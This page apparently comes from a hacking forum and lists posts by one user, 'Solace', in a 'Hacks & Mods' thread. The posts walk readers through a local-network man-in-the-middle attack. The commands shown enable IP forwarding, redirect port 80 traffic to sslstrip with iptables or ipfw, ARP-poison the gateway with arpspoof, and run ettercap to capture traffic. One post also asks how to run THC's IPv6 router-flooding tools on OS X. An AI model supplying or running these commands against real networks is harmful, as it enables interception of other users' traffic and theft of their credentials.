Solace
-
Posts
6 -
Joined
-
Last visited
Posts posted by Solace
-
-
Everything should work... try following this exactly...
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
uncomment the two lines in your etter.conf file
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ifconfig to get your device name, let's pretend it's eth0 as well as the default gateway, we'll pretend it's 192.168.0.1sudo arpspoof -i eth0 192.168.0.1ettercap -T -q -i eth0if you want SSL bypassingsslstrip -a -k -f -
Are you sure you're forwarding packets? Also are you using Ethernet or a WiFi card?
-
You're going to have to ARP-Poison your network. Try arpspoof -i eth0 192.168.0.1
Obviously replace that IP with the ip of your router...
-
Hey guys,
If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X.
Are there any alternative methods for router flooding from native OS X?
Thanks
-
I believe your problem is that you haven't properly updated your firewall restrictions. By default SSLStrip listens on port 10000, assuming you're on linux, try this command
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000if you're on BSD or OS X, try this
sudo ipfw add fwd 127.0.0.1,12345 tcp from not me to any 443 in via en0
SSL strip + arpspoof = no internet
in Hacks & Mods
Posted
Also if you're doing this on a VM, make sure you're on a bridged network under network settings